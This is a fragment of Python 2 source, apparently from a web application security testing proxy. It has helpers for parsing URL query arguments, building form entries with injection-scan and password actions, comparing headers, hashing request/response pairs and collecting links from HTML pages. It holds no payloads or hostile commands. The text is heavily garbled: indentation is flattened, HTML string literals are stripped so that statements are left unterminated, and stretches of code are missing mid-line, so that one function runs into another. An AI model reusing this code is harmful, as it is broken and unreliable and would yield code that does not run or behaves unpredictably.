resultDict={} templist=argstring.split("&") for pair in templist: if pair!="": templist2=pair.split("=") if len(templist2)<2: #print "Failed to parse the URL arguments because of #invalid number of equal signs in one argument in: #\""+pair+"\" len="+str(len(templist2)) return None else: #add this argument to the Dict orderlist.append(templist2[0]) resultDict[templist2[0]]="=".join(templist2[1:]) return resultDict #turns a string into a one character list def splitstring(astring): alist=[] for ch in astring: alist.append(ch) return alist def printFormEntry(name,value): result= name+":
    \n" return result #here is where you would add actions that you want to take when #you have an argument or variable (on the rewrite request page) def printFormEntryAndValue(name,key,value,file=""): result="" result+=name+": : " result+="" result+="
    \n" #if we have a file (e.g. we are an actual argument) if file != "": result+="Entry Actions: INJECTIONSCAN" result+="\n" result+="PASSWORD" result+="
    \n" return result def printFormCheckbox(name,checked): result="" result+=name+": \n" return result #returns 1 if they are basically the same #filters out Date: and whatnot #this is basically to detect if we get different Cookies #this is lame, but it should work ok def headerdictcmp(dict1,dict2): for akey in dict1.keys(): if akey=="Date": continue if not dict2.has_key(akey): return 0 for bkey in dict1[akey]: if not bkey in dict2[akey]: return 0 return 1 #hashes a requestandresponse so we can do matches quickly #returns a string as the hash def genhash(clientheader,clientbody,serverheader,serverbody): #print "in genhash" CH=clientheader.genhash() CB=clientbody.genhash() SH=serverheader.genhash() SB=serverbody.genhash() return CH+CB+SH+SB #hashes a string to a number, then returns that number as a string def hashstring(astring): i=0 #print "in hashstring" if astring=="": return "" hashnum=0 l=len(astring) while i") if index2==-1: continue form=form[:index2] if debug_daveformparse: print "***Form Url is "+url argsDict={} inputList=form.split(" def collectURLSFromPage(page): resultList=[] #print "Doing form parser" if page.count("0: otherlist=daveFormParse(page) for key in otherlist: resultList.append(key) pass #DEBUG #return resultList #print "Doing RAW Parser" spamList=rawParse(page) for key in spamList: resultList.append(key) pass #the whole "AbstractFormater()" line is a bunch of crap I copied #That needs to be documented somehow, but I have no idea what it does try: parser=HTMLParser(AbstractFormatter(DumbWriter(StringIO()))) parser.feed(page) parser.close() except: #print "DEBUG: Caught an exception trying to parse that html file." #print "(Not sure why this happens - you'll have to crawl this page manually)" return resultList #print "Adding HTML Parser data" for key in parser.anchorlist: resultList.append(key) pass return resultList